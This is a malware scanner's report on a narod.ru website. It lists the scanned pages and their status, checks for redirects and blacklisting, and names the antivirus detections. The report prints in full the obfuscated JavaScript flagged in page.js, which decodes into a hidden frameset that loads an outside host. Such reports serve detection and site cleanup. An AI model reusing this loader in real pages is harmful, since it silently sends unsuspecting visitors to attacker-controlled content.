Malware Scanner report for inreslidi.narod.ru

Malicious/Suspicious/Total urls checked: 1/0/15

1 page has malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://inreslidi.narod.ru/6/post-236.html	200 OK Content-Length: 40052 Content-Type: text/html	clean
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.637501869739054	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/abnl/?adsdata=LnKL4Dgu4GC8p^yrJjt!KFRgU^SRakk7bEKElApTDXvwSKOiV9YVaLMn0mT1zX6iWDlvVPJb6fxBMlg7L;tXdWSyCqQ3VzAU^EkSO2c3!Nk;DJ!4wsABsxlxIlbrg3M8RlFJiY8ruaTg7GfBZzpBc8E72cHQRN^^uVnAEsmOvacpE1ZOLBpuzZRPV;YIAUoo	200 OK Content-Length: 2529 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/js/page.js	200 OK Content-Length: 802 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60-102-114-97-109-101-115-101-116-32-114-111-119-115-61-34-49-48-48-37-34-32-102-114-97-109-101-98-111-114-100-101-114-61-34-48-34-32-102-114-97-109-101-115-112-97-99-105-110-103-61-34-48-34-62-13-10-60-102-114-97-109-101-32-115-114-99-61-34-104-116-116-112-58-47-47-114-101-103-116-104-105-115-46-114-117-47-103-111-46-112-104-112-63-115-105-100-61-50-34-32-102-114-97-109-101-98-111-114-100-101-114-61-34-48-34-32-109-97-114-103-105-110-119-105-100-116-104-61-34-48-34-32-109-97-114-103-105-110-104-101-105-103-104-116-61-34-48-34-62-13-10-60-47-102-114-97-109-101-115-101-116-62-"; l=str.length; while(c<=str.length-1){ while(str.charAt(c)!='-')temp=temp+str.charAt(c++); c++; out=out+String.fromCharCode(temp); temp=""; } document.write(out); Antivirus reports: AntiVir JS/Decdec.psc Avast JS:Redirector-KP [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.JS.QLT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.F47V0122 Emsisoft Trojan.JS.QLT (B) Comodo TrojWare.JS.Redirect.crk McAfee-GW-Edition JS/Exploit-Blacole.hv DrWeb JS.IFrame.180 Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC MicroWorld-eScan Trojan.JS.QLT Fortinet JS/Kryptik.BP!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hv NANO-Antivirus Trojan.Script.Packed.iagb F-Secure Trojan.JS.QLT VIPRE Malware.JS.Generic (JS) F-Prot JS/Crypted.AT.gen eSafe JS.Agent.ia AVG JS/Redir Norman Redir.GS Sophos Mal/Iframe-F GData Trojan.JS.QLT Symantec Trojan.Malscript!JS Commtouch JS/Crypted.AT.gen Agnitum JS.Cored.A ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.QLT
http://inreslidi.narod.ru/index.html	200 OK Content-Length: 36884 Content-Type: text/html	clean
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.313116554773952	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/abnl/?adsdata=t;fW9ViX9nUer5CtzeAu91exWW55Cr2UeNG19QLtMttqxFEuflMyLDfR0M622eBs8auqMu073;RbDKFg24bhyMpxSVyg5icfSn0NGKrKFRnb!7eYpKvdM^MC8YpWE4bSF^0hVqEzA;ziZjLUQwY4dTgOrNyN6QhNjTOcOkEmWbcC;;lQlVhZ5dVPt8kvJEuP	200 OK Content-Length: 2497 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/archive-09-07-2010/post-155.html	200 OK Content-Length: 37013 Content-Type: text/html	clean
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.175786546534113	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/abnl/?adsdata=D4UN3dvCztL;xILZYnV!cIWPDc^uZKd7zPF4TcaKQq9AP9jze2RgVZUs4SDjNm7skirtM!9BXOPSpc5wLRquaeYj9NWpep;jiIU;Cnz9a6YlvrCdEB5SshFdk5UupnTUSmyngkChX8GgmCJs8QnYnnkweYFn!0bW1^!It78TPpy6hfcVQQpau0zYHDLNX7xG	200 OK Content-Length: 2529 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/cat-4/374.html	200 OK Content-Length: 38016 Content-Type: text/html	clean
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.254458279452571	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/abnl/?adsdata=kacRN66lmtF4CpQ;;qQUR4hi4JAK^PEw6ES1gjg^O681fumEh8wbnhOUN9qACtSZB2PZXTefrt0aGWbwN3dGClzb5x1sXYp0xe2G!2pu8K6gRrsNq3eWxq62N2wcTj77ta7Tbz3iIqVR;GAeKF0kilJkfN;0ZgMeu655alaGI6xAgaZsV6^Kss31RUtddcwo	200 OK Content-Length: 2501 Content-Type: application/javascript	clean
http://inreslidi.narod.ru/5-14-02-2010/article-307.html	200 OK Content-Length: 37978 Content-Type: text/html	clean
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.897237100631504	200 OK Content-Length: 25 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: inreslidi.narod.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: inreslidi.narod.ru
Referer: http://www.google.com/search?q=inreslidi.narod.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=inreslidi.narod.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://inreslidi.narod.ru/

Result: inreslidi.narod.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for inreslidi.narod.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools